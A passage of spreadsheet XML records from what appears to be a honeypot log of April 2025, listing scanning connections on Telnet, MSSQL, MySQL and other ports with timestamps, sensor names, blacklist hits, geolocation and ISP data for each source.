    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:b349"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1089"/>
    <x v="1089"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:40:29"/>
    <d v="2025-04-23T06:40:29"/>
    <d v="2025-04-23T06:40:29"/>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b:ed9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1090"/>
    <x v="1090"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:36:10"/>
    <d v="2025-04-23T03:59:11"/>
    <d v="2025-04-23T06:36:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:b0ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1091"/>
    <x v="1091"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:17:06"/>
    <d v="2025-04-23T06:17:06"/>
    <d v="2025-04-23T06:17:06"/>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a:90b2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1092"/>
    <x v="1092"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:08:11"/>
    <d v="2025-04-23T06:05:04"/>
    <d v="2025-04-23T06:08:11"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="49"/>
    <s v="Vĩnh Long Province"/>
    <s v="Trà Ôn District"/>
    <s v="Trà Ôn"/>
    <s v="1563977"/>
    <s v="NA"/>
    <s v="9.96261"/>
    <s v="105.922"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ebf:6277"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1093"/>
    <x v="1093"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:57:48"/>
    <d v="2025-04-23T05:57:48"/>
    <d v="2025-04-23T05:57:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:8e3b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1094"/>
    <x v="1094"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:54:23"/>
    <d v="2025-04-09T14:40:05"/>
    <d v="2025-04-23T05:54:23"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="VIETTEL"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7506:7f15"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1095"/>
    <x v="1095"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:52:21"/>
    <d v="2024-03-06T18:59:00"/>
    <d v="2025-04-23T05:52:21"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="36454&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:bb06"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1096"/>
    <x v="1096"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:45:51"/>
    <d v="2025-03-21T19:03:31"/>
    <d v="2025-04-23T05:45:51"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="T"/>
    <s v="Örebro"/>
    <s v="Örebro Municipality"/>
    <s v="Örebro"/>
    <s v="2686657"/>
    <s v="700 02"/>
    <s v="59.2753"/>
    <s v="15.2134"/>
    <s v="1257"/>
    <s v="Tele2 Sverige AB"/>
    <s v="Tele2 Sverige AB"/>
    <s v="business"/>
    <s v="Karlskoga stadsnat"/>
    <s v="2006-01-24"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5854:fb2e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1097"/>
    <x v="1097"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:44:25"/>
    <d v="2025-04-23T05:44:25"/>
    <d v="2025-04-23T05:44:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Bhiwani"/>
    <s v="Lohāru"/>
    <s v="1264829"/>
    <s v="NA"/>
    <s v="28.4299"/>
    <s v="75.8078"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:bb51"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1098"/>
    <x v="1098"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:41:53"/>
    <d v="2025-04-23T00:06:00"/>
    <d v="2025-04-23T05:41:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75de:652a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1099"/>
    <x v="1099"/>
    <s v="NA&amp;&amp;114-33-115-150.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-23T05:20:18"/>
    <d v="2024-12-16T01:16:11"/>
    <d v="2025-04-23T05:20:18"/>
    <n v="360"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23&amp;&amp;9100&amp;&amp;80&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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7221:7396"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan and exploit various services on the network, likely for reconnaissance and potential further attacks. They are probing different ports and protocols, trying to identify vulnerabilities and gain unauthorized access."/>
    <s v="Scan and Exploit Attack"/>
  </r>
  <r>
    <x v="1100"/>
    <x v="1100"/>
    <s v="NA&amp;&amp;ppp-2-86-249-214.home.otenet.gr"/>
    <x v="0"/>
    <d v="2025-04-23T05:10:14"/>
    <d v="2025-04-09T06:52:41"/>
    <d v="2025-04-23T05:10:14"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GR"/>
    <s v="Greece"/>
    <s v="I"/>
    <s v="Attica"/>
    <s v="Nomarchía Athínas"/>
    <s v="Athens"/>
    <s v="264371"/>
    <s v="NA"/>
    <s v="37.9838"/>
    <s v="23.7278"/>
    <s v="6799"/>
    <s v="Ote SA (Hellenic Telecommunications Organisation)"/>
    <s v="OTEnet"/>
    <s v="business"/>
    <s v="Ote SA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:256:f9d6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1101"/>
    <x v="1101"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:07:47"/>
    <d v="2024-12-23T19:15:16"/>
    <d v="2025-04-23T05:07:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:676a"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1102"/>
    <x v="1102"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T05:04:04"/>
    <d v="2025-04-23T05:04:04"/>
    <d v="2025-04-23T05:04:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:be02"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1103"/>
    <x v="1103"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T04:56:22"/>
    <d v="2025-04-23T04:56:22"/>
    <d v="2025-04-23T04:56:22"/>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d8:14df"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1104"/>
    <x v="1104"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T04:29:18"/>
    <d v="2025-04-23T04:29:18"/>
    <d v="2025-04-23T04:29:18"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4f29"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1105"/>
    <x v="1105"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T03:53:52"/>
    <d v="2025-04-23T03:53:52"/>
    <d v="2025-04-23T03:53:52"/>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f:fe05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1106"/>
    <x v="1106"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T03:52:34"/>
    <d v="2023-07-26T20:02:01"/>
    <d v="2025-04-23T03:52:34"/>
    <n v="1877"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;389&amp;&amp;28409&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="69"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1e7:de16"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1107"/>
    <x v="1107"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T03:29:16"/>
    <d v="2023-12-02T08:19:00"/>
    <d v="2025-04-23T03:29:16"/>
    <n v="240"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;30204"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7355"/>
    <s v="51.4023"/>
    <s v="49100"/>
    <s v="Pishgaman Toseeh Ertebatat Company (Private Joint Stock)"/>
    <s v="Pishgaman Toseeh Ertebatat Company (Private Joint Stock)"/>
    <s v="business"/>
    <s v="Pishgaman Toseeh Ertebatat Company (Private Joint Stock)"/>
    <s v="2012-08-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5ca:6599"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1108"/>
    <x v="1108"/>
